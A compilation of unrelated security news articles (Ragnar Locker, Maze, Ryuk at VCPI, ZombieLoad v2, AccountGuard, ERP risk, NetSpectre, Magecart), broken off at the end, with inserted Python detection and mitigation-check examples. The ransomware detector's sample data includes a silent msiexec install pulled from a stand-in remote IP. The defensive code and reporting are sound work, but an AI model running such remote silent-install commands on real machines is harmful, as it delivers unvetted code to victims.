
Ragnar Locker ransomware attack hides inside virtual machine

Threat actors developed a new type of ransomware attack that uses virtual machines, Sophos revealed Thursday in a blog post.

Sophos researchers recently detected a Ragnar Locker ransomware attack that “takes defense evasion to a new level.” According to the post, the ransomware was deployed inside a Windows XP virtual machine so that the malicious code would stay out of reach of antimalware detection on the host. The attackers shipped the virtual machine together with an old version of Sun xVM VirtualBox, the free, open source hypervisor that passed to Oracle when it acquired Sun Microsystems in 2010.

“In the detected attack, the Ragnar Locker actors used a GPO task to execute Microsoft Installer (msiexec.exe), passing parameters to download and silently install a 122 MB crafted, unsigned MSI package from a remote web server,” Mark Loman, Sophos’ director of engineering for threat mitigation, wrote in the post.

The MSI package contained Sun xVM VirtualBox version 3.0.4, released in August 2009, and “an image of a stripped-down version of the Windows XP SP3 operating system, called MicroXP v0.82.” Inside that image is a 49 KB Ragnar Locker executable.

“Since the vrun.exe ransomware application runs inside the virtual guest machine, its process and behaviors can run unhindered, because they’re out of reach for security software on the physical host machine,” Loman wrote.
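A detection pass over process-creation telemetry for the two observable steps of the chain described above (a silent msiexec install pulled from a remote URL, then a VirtualBox front-end process on a host that has no business running a hypervisor), as an added example; this is not Sophos' code. The events are constructed in the shape of Sysmon event 1 records with hypothetical hosts, IPs and paths (the "Host" field is an assumption; Sysmon's real field names are Image, CommandLine and ParentImage). The VirtualBox binary names are the hypervisor's real file names; the host allowlist is an assumption.

```python
import json
import re
from pathlib import PureWindowsPath
from typing import Dict, Iterable, List, Set

# Constructed Sysmon-style process-creation events (hosts, IPs and paths are invented).
SAMPLE_EVENTS = [
    r'{"EventID":1,"Host":"ws-01","Image":"C:\\Windows\\System32\\msiexec.exe",'
    r'"CommandLine":"msiexec.exe /i http://203.0.113.5/update.msi /q",'
    r'"ParentImage":"C:\\Windows\\System32\\svchost.exe"}',
    r'{"EventID":1,"Host":"ws-01","Image":"C:\\Program Files\\VirtualBox\\VBoxHeadless.exe",'
    r'"CommandLine":"VBoxHeadless.exe --startvm micro","ParentImage":"C:\\Windows\\System32\\cmd.exe"}',
    r'{"EventID":1,"Host":"dev-07","Image":"C:\\Program Files\\Oracle\\VirtualBox\\VBoxHeadless.exe",'
    r'"CommandLine":"VBoxHeadless.exe --startvm ubuntu","ParentImage":"C:\\Program Files\\Oracle\\VirtualBox\\VirtualBox.exe"}',
    r'{"EventID":1,"Host":"ws-02","Image":"C:\\Windows\\System32\\msiexec.exe",'
    r'"CommandLine":"msiexec.exe /i C:\\Deploy\\7zip.msi /qn","ParentImage":"C:\\Windows\\System32\\svchost.exe"}',
    r'{"EventID":1,"Host":"ws-03","Image":"C:\\Windows\\System32\\notepad.exe",'
    r'"CommandLine":"notepad.exe","ParentImage":"C:\\Windows\\explorer.exe"}',
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# msiexec quiet switches: /q, /qn, /qb, /quiet (no UI, the user sees nothing).
QUIET_RE = re.compile(r"(?:^|\s)/(?:q[nb]?|quiet)(?=\s|$)", re.IGNORECASE)
# VirtualBox's own front-end/service executables. Their presence is an indicator,
# not proof, so the rule is paired with a host allowlist.
VBOX_BINARIES = {"vboxheadless.exe", "virtualbox.exe", "vboxsvc.exe", "vboxmanage.exe"}


def image_name(win_path: str) -> str:
    """Basename of a Windows path, lower-cased for comparison."""
    return PureWindowsPath(win_path).name.lower()


def classify(event: Dict, vbox_allowed_hosts: Set[str]) -> List[str]:
    """Return the rule names an event trips (empty list if benign)."""
    rules = []
    image = image_name(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if image == "msiexec.exe" and URL_RE.search(cmd) and QUIET_RE.search(cmd):
        rules.append("remote_silent_msi_install")      # step one of the chain
    if image in VBOX_BINARIES and event.get("Host") not in vbox_allowed_hosts:
        rules.append("unexpected_hypervisor_process")  # step two of the chain
    return rules


def scan(lines: Iterable[str], vbox_allowed_hosts: Iterable[str] = ()) -> List[Dict]:
    """Run both rules over JSON event lines and return the hits."""
    allowed = set(vbox_allowed_hosts)
    hits = []
    for line in lines:
        ev = json.loads(line)
        for rule in classify(ev, allowed):
            hits.append({"host": ev.get("Host"), "rule": rule, "cmd": ev.get("CommandLine")})
    return hits


def correlate(hits: List[Dict]) -> List[str]:
    """Hosts on which both steps fired: the strongest signal for this delivery chain."""
    by_host: Dict[str, Set[str]] = {}
    for h in hits:
        by_host.setdefault(h["host"], set()).add(h["rule"])
    wanted = {"remote_silent_msi_install", "unexpected_hypervisor_process"}
    return sorted(host for host, rules in by_host.items() if wanted <= rules)


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS, vbox_allowed_hosts={"dev-07"})
    for h in found:
        print(f"{h['host']}: {h['rule']}: {h['cmd']}")
    print("hosts showing the full chain:", correlate(found))
```

Either rule alone is noisy: administrators do push MSIs from internal web servers, and developers run VirtualBox. The correlation across the two, on a host outside the allowlist, is what is worth paging on. Because the guest is a real VirtualBox VM, host-side antimalware sees only the hypervisor process, so process creation and GPO scheduled-task telemetry are the place to look, not file scanning.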

This was the first time Sophos had seen a virtual machine used to deliver ransomware, Loman said.

It’s unclear how many organizations were affected by this recent attack and how widespread it was. Sophos was unavailable for comment at press time. In the past, the Ragnar Locker ransomware group has targeted managed service providers and used their remote access to clients to infect more organizations.

In other Sophos news, the company published an update Thursday regarding the attacks on Sophos XG Firewalls. Threat actors used a customized Trojan Sophos calls “Asnarök” to exploit a zero-day SQL injection vulnerability in the firewalls, which the vendor patched through a hotfix. Sophos researchers said the Asnarök attackers then modified their attack to bypass the hotfix and deploy ransomware in customer environments, but other mitigation steps Sophos had taken beyond the hotfix prevented the modified attacks.


Maze ransomware gang pledges to stop attacking hospitals

The notorious Maze ransomware gang announced Wednesday that it will not attack any healthcare organizations during the COVID-19 pandemic.

The pandemic has put a strain on hospitals and public health agencies in recent weeks as governments across the globe struggle to contain the spread of COVID-19, the disease caused by the novel coronavirus. Some security vendors have expressed concern that coronavirus-related threats could soon include ransomware attacks, which would have a crippling effect on healthcare and government organizations working on treatment and containment of the virus.

But at least one cybercrime outfit is pledging to refrain from such attacks, at least on healthcare organizations. The Maze ransomware gang, which last year began “shaming” victims by exfiltrating and publishing organizations’ sensitive data, promised to “stop all activity versus all kinds of medical organizations until the stabilization of the situation with virus,” according to an announcement on its website.

BleepingComputer, which first reported the announcement, also contacted other ransomware operators about stopping attacks on healthcare and medical organizations during the pandemic. The DoppelPaymer gang also pledged to stop such attacks, though other ransomware groups such as Ryuk and Sodinokibi/REvil did not respond to BleepingComputer’s queries.

The Maze gang’s pledge, however, says nothing about attacks on city, state or local governments or public health agencies. The Maze gang also said it will “help commercial organizations as much as possible” during the pandemic by offering “exclusive discounts” on ransoms to both current and future ransomware victims; the cybercriminals said they will provide decryptors and delete any data published on the site.

A screenshot of the Maze ransomware gang’s announcement that it will not attack healthcare organizations during the coronavirus pandemic.

Despite the promises of the DoppelPaymer and Maze ransomware gangs, it’s unclear how much control they have over what organizations are attacked. Many outfits use a ransomware-as-a-service model where they develop the malicious code and then sell it to other cybercriminals, which are often called affiliates.

These affiliates then conduct the actual intrusions, data exfiltration and ransomware deployment and pay the authors a share of the proceeds. Many ransomware incidents begin with phishing emails or brute-force attacks on exposed Remote Desktop Protocol (RDP) instances; threat researchers have said it’s likely that ransomware actors aren’t targeting organizations by name or industry so much as capitalizing on the most vulnerable networks.


Recent ransomware attack cripples nursing homes, acute care facilities

A recent ransomware attack has affected roughly 110 nursing homes and acute care facilities in 45 states, cutting caretakers off from patient records.

Virtual Care Provider Inc. (VCPI), a Milwaukee-based IT consulting, security and management service company, first became aware of the attack Nov. 17. In a letter to clients, VCPI said the business was hit with Ryuk ransomware, which is used in targeted attacks on large organizations, and that it was delivered by TrickBot, a modular banking trojan that targets Windows machines.

The company estimated that 20% of its servers were affected by the attack and that roughly 100 physical servers will need to be rebuilt. VCPI said it is using a virus-specific scanning tool on individual Microsoft Windows servers to verify they aren’t infected; any server found to be infected will be restored. The company maintains roughly 80,000 computers and servers for the affected facilities, according to KrebsOnSecurity, which broke the story.

Attackers are demanding $14 million in Bitcoin as ransom for a digital key that VCPI could use to unlock access to its files, a price the company doesn’t want to pay, according to KrebsOnSecurity. VCPI CEO and owner Karen Christianson said in an interview with the security news site that the attack affected nearly all of its offerings, including email and internet service, client billing and phone systems, and access to patient records. She said the ongoing attack is keeping care facilities from accessing patient records.

Experts said the incident shows that even organizations with strong procedures and controls can fall victim to attack, a stark warning to healthcare CIOs to educate employees on cybersecurity best practices.

Ransomware’s impact on healthcare

Larry Ponemon, founder of data protection research company Ponemon Institute in Traverse City, Mich., described the recent ransomware attack as especially devastating.


“It’s very serious because it’s not just about losing some data or preventing people from accessing their data,” he said. “It’s about the ability to provide services that can be life and death.”

If a ransom isn’t paid to retrieve a digital key to unlock the files, Ponemon said it can take months, or even years, for an affected healthcare organization or business to rebuild its systems after a ransomware attack.

In the letter sent by VCPI, the company said its plan is to rebuild servers and install them into newly created network segments. It is prioritizing servers that provide access to email and EHR applications. The company acknowledged it doesn’t know when clients will have access to VCPI systems again and noted that it intends to investigate if the recent ransomware attack has resulted in the acquisition of client data.

“We are working diligently, nonstop, without resource constraint, according to our documented plan, and with experienced expert leadership,” the letter stated. “We need to ensure the integrity of the new environment. We are prioritizing critical VCPI infrastructure, including Microsoft Exchange email system, and electronic health record software.”


David Chou, vice president and principal analyst for Constellation Research in Cupertino, Calif., said he was struck not by the ransomware attack but by the fact that the victim is a technology company that provides technology services to healthcare organizations.

Chou said the incident highlights the importance of properly educating employees to be aware of the ways attackers will try to infiltrate an organization’s systems and to ask questions before opening external emails with potentially malicious attachments. “If you don’t, you’re going to pay the price,” he said.


ZombieLoad v2 disclosed, affects newest Intel chips

Security researchers disclosed a new version of the ZombieLoad attack and warned that Intel’s fixes for the original threat can be bypassed.

The original ZombieLoad attack — a speculative execution exploit that could allow attackers to steal sensitive data from Intel processors — was first announced May 14 as part of a set of microarchitectural data sampling (MDS) attacks that also included RIDL (Rogue In-Flight Data Load) and Fallout. According to the researchers, they first disclosed ZombieLoad v2 to Intel on April 23 with an update on May 10 to communicate that “the attacks work on Cascade Lake CPUs,” Intel’s newest line of processors. However, ZombieLoad v2 was kept under embargo until this week.

“We present a new variant of ZombieLoad that enables the attack on CPUs that include hardware mitigations against MDS in silicon. With Variant 2 (TAA), data can still be leaked on microarchitectures like Cascade Lake where other MDS attacks like RIDL or Fallout are not possible,” the researchers wrote on the ZombieLoad website. “Furthermore, we show that the software-based mitigations in combinations with microcode updates presented as countermeasures against MDS attacks are not sufficient.”

One of the ZombieLoad researchers, Moritz Lipp, PhD candidate in information security at the Graz University of Technology in Austria, told SearchSecurity the problem with the patch for the initial MDS issues is that it “does not prevent the attack, just makes it harder. It just takes longer as the leakage rate is not that high.”

Lipp added that the team’s relationship with Intel has been improving over the past two years and the extended embargo was a direct result of ZombieLoad v2 affecting Cascade Lake processors.

In an update to the original ZombieLoad research paper, the researchers noted that the main advantage of variant two “is that it also works on machines with hardware fixes for Meltdown,” and noted that the attack requires “the Intel TSX instruction-set extension which is only available on selected CPUs since 2013,” including various Skylake, Kaby Lake, Coffee Lake, Broadwell and Cascade Lake processors.

Intel did not respond to questions regarding ZombieLoad v2, which the company refers to as TSX Asynchronous Abort (TAA), or the original MDS patch, and instead directed SearchSecurity to the company’s November 2019 Intel Platform Update blog post. In that blog post, Jerry Bryant, director of communications for Intel Product Assurance and Security, admitted Intel’s MDS mitigations fell short.

“We believe that the mitigations for TAA and MDS substantively reduce the potential attack surface,” Bryant wrote. “Shortly before this disclosure, however, we confirmed the possibility that some amount of data could still be inferred through a side-channel using these techniques (for TAA, only if TSX is enabled) and will be addressed in future microcode updates.”

In an attached “deep dive,” Intel also admitted the ZombieLoad v2 attack “may expose data from either the current logical processor or from the sibling logical processor on processors with simultaneous multithreading.”
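A check a Linux administrator can run for the two conditions named above (TSX enabled, and a sibling hyperthread that can still sample the buffers), as an added example; it is not Intel's or the researchers' code. It reads the rtm CPU flag from /proc/cpuinfo and the kernel's verdict in /sys/devices/system/cpu/vulnerabilities/tsx_async_abort (the status strings below follow the kernel's own wording for that file). The sample texts are constructed; the tsx=off and tsx_async_abort= kernel parameters it recommends are the real mitigation knobs.

```python
from dataclasses import dataclass
from typing import Set

SYSFS_TAA = "/sys/devices/system/cpu/vulnerabilities/tsx_async_abort"

# Constructed samples: a Cascade Lake-class host before and after mitigation.
CPUINFO_WITH_TSX = (
    "processor\t: 0\nvendor_id\t: GenuineIntel\nmodel name\t: Intel(R) Xeon(R) Gold (constructed)\n"
    "flags\t\t: fpu vme de pse sse2 ht syscall avx2 hle rtm md_clear flush_l1d\n"
)
CPUINFO_TSX_OFF = CPUINFO_WITH_TSX.replace(" hle rtm", "")
REPORT_VULNERABLE = "Vulnerable\n"
REPORT_TSX_DISABLED = "Mitigation: TSX disabled\n"
REPORT_VERW_SMT_ON = "Mitigation: Clear CPU buffers; SMT vulnerable\n"
REPORT_NOT_AFFECTED = "Not affected\n"


@dataclass
class TaaAssessment:
    tsx_usable: bool     # rtm flag present, so a TAA gadget can run on this core
    report: str          # the kernel's own verdict, verbatim
    exposed: bool        # kernel still says Vulnerable
    cross_thread: bool   # a sibling hyperthread can still sample the buffers
    action: str


def cpu_flags(cpuinfo_text: str) -> Set[str]:
    """Flags of the first logical CPU listed in /proc/cpuinfo."""
    for line in cpuinfo_text.splitlines():
        if line.startswith("flags"):
            return set(line.split(":", 1)[1].split())
    return set()


def assess_taa(cpuinfo_text: str, sysfs_text: str) -> TaaAssessment:
    """Combine the CPU flag list and the sysfs report into one verdict."""
    tsx = "rtm" in cpu_flags(cpuinfo_text)
    report = sysfs_text.strip()
    exposed = report.startswith("Vulnerable")
    cross_thread = "SMT vulnerable" in report
    if report == "Not affected":
        action = "none: CPU is not affected by TAA"
    elif exposed and tsx:
        action = "boot with tsx=off (or tsx_async_abort=full,nosmt) and update microcode"
    elif exposed:
        action = "TSX is already unavailable; update microcode/kernel so the report reflects it"
    elif cross_thread:
        action = "buffers are cleared on kernel exit, but a sibling thread can still sample them: add nosmt"
    else:
        action = "mitigated"
    return TaaAssessment(tsx, report, exposed, cross_thread, action)


def assess_live_host() -> TaaAssessment:
    """Same check against the running host (Linux only)."""
    with open("/proc/cpuinfo") as cpuinfo, open(SYSFS_TAA) as sysfs:
        return assess_taa(cpuinfo.read(), sysfs.read())


if __name__ == "__main__":
    for label, cpu, rep in [("unpatched", CPUINFO_WITH_TSX, REPORT_VULNERABLE),
                            ("tsx=off", CPUINFO_TSX_OFF, REPORT_TSX_DISABLED),
                            ("verw, SMT on", CPUINFO_WITH_TSX, REPORT_VERW_SMT_ON)]:
        a = assess_taa(cpu, rep)
        print(f"{label:12} tsx={a.tsx_usable} exposed={a.exposed} smt={a.cross_thread}: {a.action}")
```

The cross-thread case is the one Intel's deep dive describes: buffer clearing on the kernel boundary does nothing against a sibling hyperthread that runs concurrently, so on a host that schedules untrusted tenants on the same core the choice is tsx=off or nosmt, not a microcode update alone.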

The researchers also noted that with the range of CPUs affected, the attack could be performed both on PCs as well as in the cloud.

“The attack can be mounted in virtualized environments like the cloud as well across hyperthreads, if two virtual machines are each running on one of them,” Lipp told SearchSecurity. “However, typically huge cloud providers don’t schedule virtual machines anymore.”

Chris Goettl, director of product management, security at Ivanti, told SearchSecurity that while the research is interesting, the risks of ZombieLoad are relatively low.

“In a cloud environment a vulnerability like this could allow an attacker to glean information across many companies, true, but we are talking about a needle in a field of haystacks,” Goettl said. “Threat actors have motives and they will drive toward their objectives in most cases as quickly and easily as they possibly can. There are a number of information disclosure vulnerabilities that are going to be far easier to exploit than ZombieLoad.”

Lipp confirmed that in order to ensure the leak of sensitive data an attacker would need to ensure “a victim loads specific data, for instance triggering code that loads passwords in order to authenticate a user, an attacker can leak that.”

Ultimately, Goettl said he would expect Intel to continue to be reactive with side-channel attacks like ZombieLoad until there is “a precipitating event where any of these exploits are used in a real-world attack scenario.”

“The incomplete MDS patch probably says a little about how much effort Intel is putting into resolving the vulnerabilities. They fixed exactly what they were shown was the issue, but didn’t look beyond to see if something more should be done or if that fix could also be circumvented,” Goettl said. “As long as speculative execution remains academic Intel’s approach will likely continue to be reactive rather than proactive.”


We are taking new steps against broadening threats to democracy – Microsoft on the Issues

It’s clear that democracies around the world are under attack. Foreign entities are launching cyber strikes to disrupt elections and sow discord. Unfortunately, the internet has become an avenue for some governments to steal and leak information, spread disinformation, and probe and potentially attempt to tamper with voting systems. We saw this during the United States general election in 2016, last May during the French presidential election, and now in a broadening way as Americans are preparing for the November midterm elections.

Broadening cyberthreats to both U.S. political parties make clear that the tech sector will need to do more to help protect the democratic process. Last week, Microsoft’s Digital Crimes Unit (DCU) successfully executed a court order to disrupt and transfer control of six internet domains created by a group widely associated with the Russian government and known as Strontium, or alternatively Fancy Bear or APT28. We have now used this approach 12 times in two years to shut down 84 fake websites associated with this group. Attackers want their attacks to look as realistic as possible and they therefore create websites and URLs that look like sites their targeted victims would expect to receive email from or visit. The sites involved in last week’s order fit this description.

We’re concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections. That’s why today we are expanding Microsoft’s Defending Democracy Program with a new initiative called Microsoft AccountGuard. This initiative will provide state-of-the-art cybersecurity protection at no extra cost to all candidates and campaign offices at the federal, state and local level, as well as think tanks and political organizations we now believe are under attack. The technology is free of charge to candidates, campaigns and related political institutions using Office 365.

As a special master appointed by a federal judge concluded in the recent court order obtained by DCU, there is “good cause” to believe that Strontium is “likely to continue” its conduct. In the face of this continuing activity, we must work on the assumption that these attacks will broaden further. An effective response will require even more work to bring people and expertise together from across governments, political parties, campaigns and the tech sector.

An expansion of political targets

Last week’s order transferred control of the six internet domains listed below from Strontium to Microsoft, preventing Strontium from using them and enabling us to more closely look for evidence of what Strontium intended to do with the domains. These six domains are listed here:

(Image: list of the six internet domains that were ordered transferred from Strontium to Microsoft.)

Importantly, these domains show a broadening of entities targeted by Strontium’s activities. One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices. To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.

Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators.

Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.

Our new Microsoft AccountGuard initiative

AccountGuard will provide three services that will cover both organizational and personal email accounts:

  1. Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
  2. Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
  3. Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

You can read a more complete description of Microsoft AccountGuard in today’s blog by Tom Burt, the corporate vice president who heads Microsoft’s Customer Security and Trust group.

Microsoft’s Defending Democracy Program

Since we launched Microsoft’s Defending Democracy Program in April, we have focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns. In the coming months, we will offer AccountGuard in additional countries, as we continue to invest in and evolve other aspects of the Defending Democracy Program.

Our Defending Democracy Program is an important piece of our work to protect customers and promote cyberdiplomacy around the world. While cybersecurity starts with Microsoft and other companies in the tech sector, it’s ultimately a shared responsibility with customers and governments around the world. Together with our industry partners, we’ve launched the Cybersecurity Tech Accord, now endorsed by 44 leading tech companies to protect and empower civilians online and to improve the security, stability and resilience of cyberspace. And we will continue to call for stronger adherence to existing international norms and the creation of new international laws – like a Digital Geneva Convention.

As last week’s court order and today’s AccountGuard initiative reflect, we are committed not only to stronger principles and laws but stronger action as well.

A democracy requires vigilance

In 1787, as the American constitutional convention reached its conclusion in Philadelphia, Benjamin Franklin was asked as he departed Independence Hall what type of government the delegates had created. He famously replied, “A republic, if you can keep it.”

We can only keep our democratic societies secure if candidates can run campaigns and voters can go to the polls untainted by foreign cyberattacks.

Democracy requires vigilance and at times action by citizens to protect and maintain it. No individual or company can hope to meet this imperative by itself. We all need to do our part. We’re committed to doing our part by helping to protect candidates and campaigns in preserving their voices and votes no matter what party they support.


Report: ERP security is weak, vulnerable and under attack

ERP systems are seeing growing levels of attack for two reasons. First, many of these systems, especially in the U.S., are now connected to the internet. Second, ERP security is hard: these systems are so complex and customized that patching is expensive, complicated and often put off.

Windows systems are often patched within days, but users may wait years to patch some ERP systems. There are old versions of PeopleSoft and other ERP applications, for instance, that are out-of-date and connected to the internet, according to researchers at two cybersecurity firms, which jointly looked at the risks faced in ERP security.

These large corporate systems, which manage global supply chains and manufacturing operations, could be compromised and shut down by an attacker, said Juan Pablo Perez-Etchegoyen, CTO of Onapsis, a cybersecurity firm based in Boston.

“If someone manages to breach one of those [ERP] applications, they could literally stop operations for some of those big players,” Perez-Etchegoyen said in an interview. His firm, along with Digital Shadows, released a report, “ERP Applications Under Fire: How Cyberattackers Target the Crown Jewels,” which was recently cited as a must-read by the U.S. Computer Emergency Readiness Team within the Department of Homeland Security. This report looked specifically at Oracle and SAP ERP systems.

Warnings of security vulnerabilities are not new

Cybersecurity researchers have been warning for a long time that U.S. critical infrastructure is vulnerable. Much of the focus has been on power plants and other utilities. But ERP systems manage critical infrastructure too, and the report by Onapsis and Digital Shadows is seen as backing up a broader worry about infrastructure risks.

“The great risk in ERP is disruption,” said Alan Paller, the founder of SANS Institute, a cybersecurity research and education organization in Bethesda, Md.

If the attackers were just interested in extortion or gaining customer data, there are easier targets, such as hospitals and e-commerce sites, Paller said. What the attackers may be doing with ERP systems is prepositioning, which can mean planting malware in a system for later use.

In other words, attackers “are not sure what they are going to do” once they get inside an ERP system, Paller said. But they would rather get inside the system now, and then try to gain access later, he said.

The report by Onapsis and Digital Shadows found growing interest among hackers in ERP-specific vulnerabilities. That interest was tracked across a variety of sources, including the dark web, the part of the internet reachable only through anonymizing overlay networks such as Tor.

Complexity makes ERP security difficult


The problem facing ERP security, Perez-Etchegoyen said, is “the complexity of ERP applications makes it really hard and really costly to apply patches. That’s why some organizations are lagging behind.”

SAP and Oracle, in emailed responses to the report, both said something similar: Customers need to stay up-to-date on patches.

“Our recommendation to all of our customers is to implement SAP security patches as soon as they are available — typically on the second Tuesday of every month — to protect SAP infrastructure from attacks,” SAP said.

Oracle pointed out that it “issued security updates for the vulnerabilities listed in this report in July and in October of last year. The Critical Patch Update is the primary mechanism for the release of all security bug fixes for Oracle products. Oracle continues to investigate means to make applying security patches as easy as possible for customers.”

One of the problems is knowing the intent of the attackers; the report cited a full range of motives, from cyberespionage to sabotage, pursued by a variety of groups, from hacktivists to foreign governments.

Next wave of attacks could be destructive

But one fear is the next wave of major attacks will attempt to destroy or cause real damage to systems and operations.

This concern was something Edward Amoroso, retired senior vice president and CSO of AT&T, warned about.

In a widely cited open letter in November 2016 to then-President-elect Donald Trump, Amoroso said attacks “will shift from the theft of intellectual property to destructive attacks aimed at disrupting our ability to live as free American citizens.” The ERP security report’s findings were consistent with his earlier warning, he said in an email.

Foreign countries know that “companies like SAP, Oracle and the like are natural targets to get info on American business,” Amoroso said. “All ERP companies understand this risk, of course, and tend to have good IT security departments. But going up against military actors is tough.”

Amoroso’s point about the risk of a destructive attack was specifically cited and backed by a subsequent MIT report, “Keeping America Safe: Toward More Secure Networks for Critical Sectors.”  The MIT report warned that attackers enjoy “inherent advantages owing to human fallibility, architectural flaws in the internet and the devices connected to it.”

NetSpectre is a remote side-channel attack, but a slow one

Researchers developed a new proof-of-concept attack on Spectre variant 1 that can be performed remotely, but despite the novel aspects of the exploit, experts questioned the real-world impact.

Michael Schwarz, Moritz Lipp, Martin Schwarzl and Daniel Gruss, researchers at the Graz University of Technology in Austria, dubbed their attack “NetSpectre” and claim it is the first remote exploit against Spectre v1 and requires “no attacker-controlled code on the target device.”

“Systems containing the required Spectre gadgets in an exposed network interface or API can be attacked with our generic remote Spectre attack, allowing [it] to read arbitrary memory over the network,” the researchers wrote in their paper. “The attacker only sends a series of crafted requests to the victim and measures the response time to leak a secret value from the victim’s memory.”

Gruss wrote on Twitter that Intel was given ample time to respond to the team’s disclosure of NetSpectre.

Gruss went on to criticize Intel for not assigning a new Common Vulnerabilities and Exposures (CVE) identifier to NetSpectre, but an Intel statement explained that this was because the fix is the same as for Spectre v1.

“NetSpectre is an application of Bounds Check Bypass (CVE-2017-5753) and is mitigated in the same manner — through code inspection and modification of software to ensure a speculation-stopping barrier is in place where appropriate,” an Intel spokesperson wrote via email. “We provide guidance for developers in our whitepaper, ‘Analyzing Potential Bounds Check Bypass Vulnerabilities,’ which has been updated to incorporate this method. We are thankful to Michael Schwarz, Daniel Gruss, Martin Schwarzl, Moritz Lipp and Stefan Mangard of Graz University of Technology for reporting their research.”

Jake Williams, founder and CEO of Rendition Infosec, agreed with Intel’s assessment and wrote by Twitter direct message that “it makes sense that this wouldn’t get a new CVE. It’s not a new vulnerability; it’s just exploiting an existing vulnerability in a new way.”

The speed of NetSpectre

Part of the research that caught the eye of experts was the detail that when exfiltrating memory, “this NetSpectre variant is able to leak 15 bits per hour from a vulnerable target system.”

Kevin Beaumont, a security architect based in the U.K., explained on Twitter what this rate of exfiltration means.

Williams agreed and said that although the NetSpectre attack is “dangerous and interesting,” it is “not worth freaking out about.”

“The amount of traffic required to leak meaningful amounts of data is significant and likely to be noticed,” Williams wrote. “I don’t think attacks like this will get significantly faster. Honestly, the attack could leak 10 to 100 times faster and still be relatively insignificant. Further, when you are calling an API remotely and others call the same API, they’ll impact timing, reducing the reliability of the exploit.”

Gruss wrote by Twitter direct message that since an attacker can use NetSpectre to choose an arbitrary address in memory to read, the impact of the speed of the attack depends on the use case.

“Remotely breaking ASLR (address space layout randomization) within a few hours is quite nice and very practical,” Gruss wrote, adding that “leaking the entire memory is of course completely unrealistic, but this is also not what any attacker would want to do.”
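A model of the measurement loop the paper describes (crafted requests, response times, one secret bit at a time) and of why the rate is so low and noise from other API callers matters, as an added example; this is a statistical stand-in, not the researchers' code and not a Spectre gadget. The victim below answers a "leak" request for bit i slower by delta when that bit is 1, and every response carries Gaussian jitter of spread sigma; the attacker sees only the times. All parameters are assumptions chosen for the demo.

```python
import random
import statistics


class NoisyVictim:
    """Stand-in for a remote service whose response time leaks one secret bit per probe."""

    def __init__(self, secret: int, nbits: int, delta: float, sigma: float, seed: int = 1):
        self.secret, self.nbits = secret, nbits
        self.delta, self.sigma = delta, sigma          # signal vs. noise, arbitrary time units
        self.rng = random.Random(seed)
        self.requests = 0                              # traffic the defender would see

    def respond(self, bit_index: int, leak: bool) -> float:
        """Response time; the only thing the attacker observes."""
        self.requests += 1
        t = 100.0 + self.rng.gauss(0.0, self.sigma)    # baseline plus network/API jitter
        if leak and (self.secret >> bit_index) & 1:
            t += self.delta                            # the gadget's measurable side effect
        return t


def recover_bit(victim: NoisyVictim, bit_index: int, samples: int) -> int:
    """Average `samples` leak probes against `samples` reference probes and threshold."""
    leak = [victim.respond(bit_index, True) for _ in range(samples)]
    ref = [victim.respond(bit_index, False) for _ in range(samples)]
    return int(statistics.fmean(leak) - statistics.fmean(ref) > victim.delta / 2)


def recover_secret(victim: NoisyVictim, samples: int) -> int:
    value = 0
    for i in range(victim.nbits):
        value |= recover_bit(victim, i, samples) << i
    return value


def bits_per_hour(samples_per_bit: int, requests_per_second: float) -> float:
    """Throughput of this scheme: two probe batches per recovered bit."""
    return 3600.0 * requests_per_second / (2 * samples_per_bit)


def error_rate(samples: int, sigma: float, trials: int = 20, nbits: int = 8) -> float:
    """Fraction of trials with at least one wrong bit at a given noise level."""
    wrong = 0
    for seed in range(trials):
        v = NoisyVictim(secret=0xA5, nbits=nbits, delta=1.0, sigma=sigma, seed=seed)
        wrong += recover_secret(v, samples) != 0xA5
    return wrong / trials


if __name__ == "__main__":
    v = NoisyVictim(secret=0xBEEF, nbits=16, delta=1.0, sigma=2.0, seed=7)
    print(hex(recover_secret(v, samples=1000)), "after", v.requests, "requests")
    for sigma in (1.0, 2.0, 4.0):
        print(f"sigma={sigma}: error rate with 200 samples/bit = {error_rate(200, sigma):.2f}")
    print("bits/hour at 100 req/s and 1000 samples/bit:", bits_per_hour(1000, 100.0))
```

The number of probes needed per bit grows with the square of the noise, and every probe is a request in the victim's logs, which is the substance of Williams' point: a remote attacker cannot lower the noise that other clients add to a shared API, so the only lever is more traffic, and more traffic is more detectable.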

Ticketmaster breach part of worldwide card-skimming campaign

The attack that caused the Ticketmaster breach of customer information last month was actually part of a widespread campaign that’s affected more than 800 e-commerce sites.

According to researchers at the threat intelligence company RiskIQ Inc., the hacking group known as Magecart has been running a digital credit card-skimming campaign that targets third-party components of e-commerce websites around the world.

At the end of June, ticket sales company Ticketmaster disclosed that it had been compromised and user credit card data had been skimmed. A report by RiskIQ researchers Yonathan Klijnsma and Jordan Herman said the Ticketmaster breach was not an isolated incident, but was instead part of the broader campaign run by the threat group Magecart.

